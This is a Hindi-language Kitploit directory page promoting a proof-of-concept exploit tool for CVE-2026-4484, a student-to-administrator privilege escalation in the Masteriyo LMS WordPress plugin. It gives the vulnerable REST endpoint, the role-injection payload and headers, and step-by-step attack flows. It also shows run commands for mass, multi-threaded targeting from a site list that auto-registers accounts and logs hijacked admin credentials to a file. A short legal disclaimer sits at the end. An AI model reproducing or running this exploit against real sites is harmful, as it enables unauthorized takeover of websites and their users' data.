Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-4484 — Masteriyo LMS <= 2.1.6 - अनुपलब्ध प्राधिकरण: प्रमाणित (छात्र+) से व्यवस्थापक तक विशेषाधिकार वृद्धि | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2026-4484
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubnxploited/cve-2026-4484

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - अनुपलब्ध प्राधिकरण: प्रमाणित (छात्र+) से व्यवस्थापक तक विशेषाधिकार वृद्धि

रिपॉजिटरी देखें
54 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - प्राधिकरण की कमी: प्रमाणित (छात्र+) विशेषाधिकार वृद्धि से व्यवस्थापक तक

Typing SVG


🔴 भेद्यता अवलोकन

CVE-2026-4484 — प्रमाणित विशेषाधिकार वृद्धि (छात्र → व्यवस्थापक)

विवरण:
WordPress के लिए Masteriyo LMS प्लगइन, 2.1.6 सहित उसके सभी संस्करणों में विशेषाधिकार वृद्धि (Privilege Escalation) की भेद्यता से ग्रस्त है। यह भेद्यता InstructorsController::prepare_object_for_database फ़ंक्शन में उत्पन्न होती है, जो REST API अनुरोधों के दौरान भूमिका निर्धारण को ठीक से प्रतिबंधित करने में विफल रहता है। मात्र छात्र-स्तरीय पहुँच वाला एक प्रमाणित हमलावर Masteriyo REST API एंडपॉइंट पर एक विशेष रूप से निर्मित POST अनुरोध भेज सकता है — अनुरोध पेलोड में "roles": ["administrator"] इंजेक्ट करके — और बिना किसी व्यवस्थापकीय हस्तक्षेप के अपने खाते को चुपचाप WordPress व्यवस्थापक (Administrator) में बदल सकता है, जिससे पूर्ण साइट पर कब्ज़ा हो जाता है।


🛠️ टूल विवरण

यह एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) शोषण स्क्रिप्ट है जो Masteriyo LMS प्लगइन के भेद्य संस्करण को चलाने वाले WordPress इंस्टॉलेशन को लक्षित करती है। टूल दो हमले मोड का समर्थन करता है:

मोडनामप्रवाहउपयोग-मामला
1

हमले का प्रवाह

root@kitploit:~
[Register / Login as Student]
         ↓
[Fetch Dashboard Context — user_id + nonce]
         ↓
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         ↓
[Re-login with fresh session]
         ↓
[Verify /wp-admin access → confirmed Administrator]
         ↓
[Write to Login_admin.txt]

📋 आवश्यकताएँ

सिस्टम आवश्यकताएँ

  • Python 3.8 या उच्चतर
  • Linux / Windows / macOS

Python निर्भरताएँ

root@kitploit:~
pip install requests urllib3 colorama

या requirements फ़ाइल के माध्यम से:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py

⚙️ उपयोग

मूलभूत निष्पादन

root@kitploit:~
python3 CVE-2026-4484.py

टूल एक इंटरैक्टिव टर्मिनल इंटरफ़ेस का उपयोग करता है — सभी पैरामीटर रनटाइम पर पूछे जाते हैं।


🗂️ लक्ष्य सूची प्रारूप

एक सादा टेक्स्ट फ़ाइल बनाएँ (जैसे, list.txt) जिसमें प्रति पंक्ति एक लक्ष्य हो:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🟥 मोड 1 — Nx_1 (पंजीकरण + लॉगिन + विशेषाधिकार वृद्धि)

इस मोड का उपयोग तब करें जब आपके पास लक्ष्य पर कोई मौजूदा खाता न हो। टूल स्वचालित रूप से एक नया छात्र खाता पंजीकृत करता है, फिर उसके विशेषाधिकार बढ़ाता (escalate) है।

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [[email protected]]: [email protected]
Password to use (Nx_1) [Nx_admin]: Nx_admin123!

स्वचालित रूप से किए जाने वाले चरण:

  1. GET /account/signup/ → पंजीकरण nonce निकालें
  2. POST /st/ → छात्र के रूप में नया खाता पंजीकृत करें
  3. GET /account/ → लॉगिन nonce निकालें
  4. POST /wp-admin/admin-ajax.php → Masteriyo AJAX के माध्यम से लॉगिन करें
  5. GET /account/#/dashboard → current_user_id + nonce निकालें
  6. POST /wp-json/masteriyo/v1/users/instructors/{id} को {"roles":["administrator"]} के साथ भेजें
  7. नए सत्र के साथ पुनः लॉगिन करें → व्यवस्थापक पैनल पहुँच सत्यापित करें
  8. पुष्टिकृत हिट्स को Login_admin.txt में लिखें

🟩 मोड 2 — Nx_2 (लॉगिन + विशेषाधिकार वृद्धि — मौजूदा खाता)

इस मोड का उपयोग तब करें जब आपके पास पहले से ही लक्ष्य पर एक मान्य छात्र या प्रशिक्षक खाता हो।

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: [email protected]
Password for that user: mypassword

स्वचालित रूप से किए जाने वाले चरण:

  1. GET /account/ → लॉगिन nonce निकालें
  2. POST /wp-admin/admin-ajax.php → Masteriyo AJAX के माध्यम से लॉगिन करें
  3. GET /account/#/dashboard → current_user_id + nonce निकालें
  4. POST /wp-json/masteriyo/v1/users/instructors/{id} को {"roles":["administrator"]} के साथ भेजें
  5. नए सत्र के साथ पुनः लॉगिन करें → व्यवस्थापक पैनल पहुँच सत्यापित करें
  6. पुष्टिकृत हिट्स को Login_admin.txt में लिखें

📁 आउटपुट फ़ाइलें

फ़ाइलविवरण
Login_admin.txtसभी पुष्टिकृत व्यवस्थापक विशेषाधिकार वृद्धियाँ

आउटपुट प्रारूप

root@kitploit:~
https://target.com/wp-login.php user:[email protected]|pass:Nx_admin123!

नमूना टर्मिनल आउटपुट

root@kitploit:~
[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).

🔍 तकनीकी विवरण

भेद्य एंडपॉइंट

root@kitploit:~
POST /wp-json/masteriyo/v1/users/instructors/{user_id}

शोषण पेलोड

root@kitploit:~
{
  "roles": ["administrator"]
}

आवश्यक हेडर

root@kitploit:~
Content-Type: application/json
X-WP-Nonce: <extracted_from_dashboard>

मूल कारण

Masteriyo LMS में InstructorsController::prepare_object_for_database फ़ंक्शन REST अनुरोध निकाय से roles पैरामीटर को यह सत्यापित किए बिना संसाधित करता है कि अनुरोध करने वाले उपयोगकर्ता के पास edit_users या promote_users क्षमता है या नहीं। कोई भी प्रमाणित उपयोगकर्ता (छात्र-स्तर या उससे ऊपर) जो इस एंडपॉइंट तक पहुँच सकता है, एक मनमाना भूमिका मान — administrator सहित — प्रस्तुत कर सकता है, जिसे सीधे WordPress उपयोगकर्ता मेटाडेटा तालिका में संग्रहीत कर दिया जाता है।


📡 संपर्क और लेखक

द्वारा: Nxploited (Khaled Alenazi)

 


⚠️ कानूनी अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।

इस परियोजना के लेखक, Nxploited (Khaled Alenazi), और सभी योगदानकर्ता, उन प्रणालियों के विरुद्ध इस टूल के दुरुपयोग या इस सॉफ़्टवेयर के उपयोग से होने वाली किसी भी क्षति के लिए, जिनके लिए आपके पास स्पष्ट लिखित प्राधिकरण नहीं है, न तो समर्थन व्यक्त करते हैं, न ही अनुमोदन करते हैं, और न ही कोई ज़िम्मेदारी लेते हैं।

  • ✅ अनुमत: उन प्रणालियों पर उपयोग करें जिनके स्वामी आप हैं या जिनके परीक्षण के लिए आपको स्पष्ट लिखित अनुमति दी गई है।
  • ❌ निषिद्ध: सिस्टम स्वामी से पूर्व स्पष्ट लिखित प्राधिकरण के बिना किसी भी प्रणाली के विरुद्ध उपयोग करना।

कंप्यूटर प्रणालियों तक अनधिकृत पहुँच अवैध है और लागू कानूनों के तहत दंडनीय है, जिसमें कंप्यूटर फ्रॉड एंड एब्यूज़ एक्ट (CFAA), कंप्यूटर मिसयूज़ एक्ट (CMA), और दुनिया भर के समकक्ष विधान शामिल हैं, लेकिन इन्हीं तक सीमित नहीं हैं।

इस टूल का उपयोग करके, आप अपने कार्यों की पूर्ण ज़िम्मेदारी स्वीकार करते हैं और पुष्टि करते हैं कि आपके पास लक्षित प्रणालियों का परीक्षण करने का कानूनी अधिकार है।

लेखक इस सॉफ़्टवेयर के उपयोग या दुरुपयोग से उत्पन्न होने वाली किसी भी प्रत्यक्ष, अप्रत्यक्ष, आकस्मिक या परिणामी क्षति के लिए कोई दायित्व ग्रहण नहीं करता है।


© 2026 Nxploited (Khaled Alenazi) — केवल अधिकृत सुरक्षा अनुसंधान के लिए।

टूल डाउनलोड करें
क्षेत्रविवरण
CVE IDCVE-2026-4484
गंभीरताउच्च — CVSS v3.1 स्कोर: 8.8
वेक्टरCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
प्रभावित सॉफ़्टवेयरWordPress के लिए Masteriyo LMS प्लगइन
प्रभावित संस्करण2.1.6 सहित सभी संस्करण
भेद्यता प्रकारविशेषाधिकार वृद्धि (भूमिका हेरफेर)
प्रमाणीकरण आवश्यकहाँ — छात्र-स्तर या उससे ऊपर
CWECWE-269: अनुचित विशेषाधिकार प्रबंधन
Nx_1
पंजीकरण → लॉगिन → विशेषाधिकार वृद्धि → व्यवस्थापक सत्यापन
नया हमला — कोई मौजूदा खाता आवश्यक नहीं
2Nx_2लॉगिन → विशेषाधिकार वृद्धि → व्यवस्थापक सत्यापनमौजूदा खाता उपलब्ध (छात्र/प्रशिक्षक)